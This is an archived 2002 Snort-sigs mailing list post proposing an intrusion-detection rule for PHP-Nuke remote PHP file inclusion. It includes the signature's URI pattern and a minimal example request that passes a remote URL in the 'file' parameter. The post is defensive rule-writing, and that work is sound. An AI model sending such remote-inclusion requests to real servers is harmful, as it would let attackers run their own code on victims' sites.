[Snort-sigs] PHPNuke rule

Michael Boman michael.boman at ...267...
Fri Jan 18 04:01:02 EST 2002


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

alert TCP $EXTERNAL_NET any -> $HTTP_SERVERS 80 (msg:"PHP-Nuke remote loading 
of PHP files exploit"; uricontent:"/index.php?file=http"; nocase; dsize: 
>24; flags: A+; classtype:web-application-attack;)

Why dsize: >24 ?

Smallest GET request I could think of is:

GET /?file=http://xx.xx/y

xx.xx = website address.. Minimum no# of char in a domain = 2 + top-domain (2)
y = script name

Any comments?

Best regards
 Michael Boman

- -- 
Michael Boman       Mobile: +65 96942601  750C Chai Chee Road
Security Architect  Phone : +65 243 6800  #04-01
SecureCiRT          Fax   : +65 441 5119  Singapore 469003
http://www.securecirt.com mailto:michael.boman at ...267...

GnuPG: FA4E C6CC B73E 320E 3349  C64F 76CE 5F40 98AB 689C
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQE8SA5Fds5fQJiraJwRAoEGAJ9ulesELSCME9t+AzpLcM/gskyCWACeO/uM
K4avX5aLt/09zWpYBIvuM18=
=9x3R
-----END PGP SIGNATURE-----




More information about the Snort-sigs mailing list